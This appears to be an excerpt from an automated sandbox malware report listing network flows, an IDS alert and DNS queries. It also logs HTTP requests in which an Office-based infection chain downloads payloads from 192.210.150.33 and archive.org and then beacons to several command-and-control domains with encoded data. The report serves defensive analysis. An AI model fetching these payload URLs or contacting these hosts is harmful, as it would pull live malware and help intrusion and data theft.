            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49162
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49166
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49169
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80
            Source: global trafficTCP traffic: 192.210.150.33:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.150.33:80

            Networking

            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49171
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeDNS query: www.2886080.xyz
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeDNS query: www.kcrkimya.xyz
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /143/WRG.txt HTTP/1.1Host: 192.210.150.33Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 45.33.6.223
            Source: Joe Sandbox ViewIP Address: 207.241.232.154
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8DE86AB.emf
            Source: global trafficHTTP traffic detected: GET /GmwgTs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jiourl.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.150.33Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /143/mekissedbutterburnwithstronglips.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.150.33Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /0ulx/?wxW=zofEiiFYwMh5LxyNu6oXSdWWcV8B67J9aDve++7abqw+/Zo42KlxLGjQ5GeTBYQyUYmjspHec65DOWQ9USsomtD+rCjeozlP1YUdWHnMSZCr4BxwQwk8MB9FDMVL&o4=jn1L46 HTTP/1.1Host: www.magicface.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: global trafficHTTP traffic detected: GET /2017/sqlite-dll-win32-x86-3200000.zip HTTP/1.1User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /rvs7/?wxW=UQf2zZJYDDL8KJweJNWXsncMp4MNFyy9iRmYgJ1J0zvq5qbAtDjd5xC0uH7MRjdVGt6kOkDqEQprzunrZ/YXaY0e9aCWqBKlXSvt2l82CG6FMXzOxBXJ399Rbxel&o4=jn1L46 HTTP/1.1Host: www.gymuniversity.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: global trafficHTTP traffic detected: GET /weeg/?o4=jn1L46&wxW=+t9vfnkbYU1QJIfziniMQm4D0SJKDGsGeZHR+z4AZEyX1J3gptrY73VQNNQ/+mGIVtW5Aqaflf0RAZz5+q7KDi1WF5zu290DE+JeXwSEBwj5ukFt81bZJ4VTl/P9 HTTP/1.1Host: www.2886080.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: global trafficHTTP traffic detected: GET /jwh2/?wxW=qwiqlQOB2sBJXed4TJefnH6tfhcmjQqGh5LRBgpS3ir2H9BZzfnnysKJE+uuqh+G2a9tjGyTB/t+dcoUENF33bMIpFI3IAf6ffgxGYIPDvPvoCP/fBQOw8HyyZkd&o4=jn1L46 HTTP/1.1Host: www.kcrkimya.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"> equals www.twitter.com (Twitter)
            Source: find.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"> equals www.facebook.com (Facebook)
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: jiourl.com
            Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
            Source: global trafficDNS traffic detected: DNS query: www.magicface.shop
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.gymuniversity.net
            Source: global trafficDNS traffic detected: DNS query: www.2886080.xyz
            Source: global trafficDNS traffic detected: DNS query: www.jnnotary.org
            Source: global trafficDNS traffic detected: DNS query: www.kcrkimya.xyz
            Source: unknownHTTP traffic detected: POST /rvs7/ HTTP/1.1Host: www.gymuniversity.netAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.gymuniversity.netReferer: http://www.gymuniversity.net/rvs7/Content-Length: 2160Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: cdcb27b3-da02-4096-b5d1-f406d443117ax-runtime: 0.043189content-length: 20068connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: ea8adc26-e34f-4563-b38d-a90a6d776e28x-runtime: 0.055378content-length: 18108connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 5dce5dc8-dfe6-4c3c-973a-f7abe45f17b2x-runtime: 0.070311content-length: 21532connection: close
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.14.1
              Date: Fri, 16 Aug 2024 07:34:06 GMT
              Content-Length: 0
              Connection: close
              X-Rate-Limit-Limit: 5s
              X-Rate-Limit-Remaining: 19
              X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.14.1
              Date: Fri, 16 Aug 2024 07:34:08 GMT
              Content-Length: 0
              Connection: close
              X-Rate-Limit-Limit: 5s
              X-Rate-Limit-Remaining: 18
              X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.14.1
              Date: Fri, 16 Aug 2024 07:34:11 GMT
              Content-Length: 0
              Connection: close
              X-Rate-Limit-Limit: 5s
              X-Rate-Limit-Remaining: 19
              X-Rate-Limit-Reset: 2024-08-16T07:34:16.4085800Z
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx/1.14.1
              Date: Fri, 16 Aug 2024 07:34:13 GMT
              Content-Length: 0
              Connection: close
              X-Rate-Limit-Limit: 5s
              X-Rate-Limit-Remaining: 19
              X-Rate-Limit-Reset: 2024-08-16T07:34:18.9812535Z
            Source: powershell.exe, 0000000A.00000002.444696114.000000000287A000.00000004.00000800.00020000.00000000.sdmp
            String found in binary or memory: http://192.210.150.33
            Source: powershell.exe, 0000000A.00000002.444696114.000000000287A000.00000004.00000800.00020000.00000000.sdmp
            String found in binary or memory: http://192.210.150.33/143/WRG.txt
            Source: EQNEDT32.EXE, 00000005.00000002.423526234.000000000061E000.00000004.00000020.00020000.00000000.sdmp
            String found in binary or memory: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIF
            Source: EQNEDT32.EXE, 00000005.00000002.423526234.000000000061E000.00000004.00000020.00020000.00000000.sdmp
            String found in binary or memory: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFauR
            Source: EQNEDT32.EXE, 00000005.00000002.423526234.000000000061E000.00000004.00000020.00020000.00000000.sdmp
            String found in binary or memory: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFj
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/config.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/helper/modernizr.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/jquery.cookie.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/template/news/lvse/skin/js/jquery.js
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/1198420.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3038130.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3087620.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3135390.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3325160.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/3466970.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/4025030.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/4370870.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/4905490.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5033160.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5046830.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5580300.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/5835120.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/595320.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/6014650.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/6496300.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/7364440.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/7726870.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8015020.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8550950.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8693410.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/8904020.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/9053100.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/uploads/images/9803940.jpg
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/weeg/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/wutengcaixiang/
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/xiaoxiyou/
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: wfbjvizcWo.exe, 0000000E.00000002.620971996.0000000001E6C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kcrkimya.xyz
            Source: wfbjvizcWo.exe, 0000000E.00000002.620971996.0000000001E6C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kcrkimya.xyz/jwh2/
            Source: find.exe, 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmp, sqlite3.dll.13.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
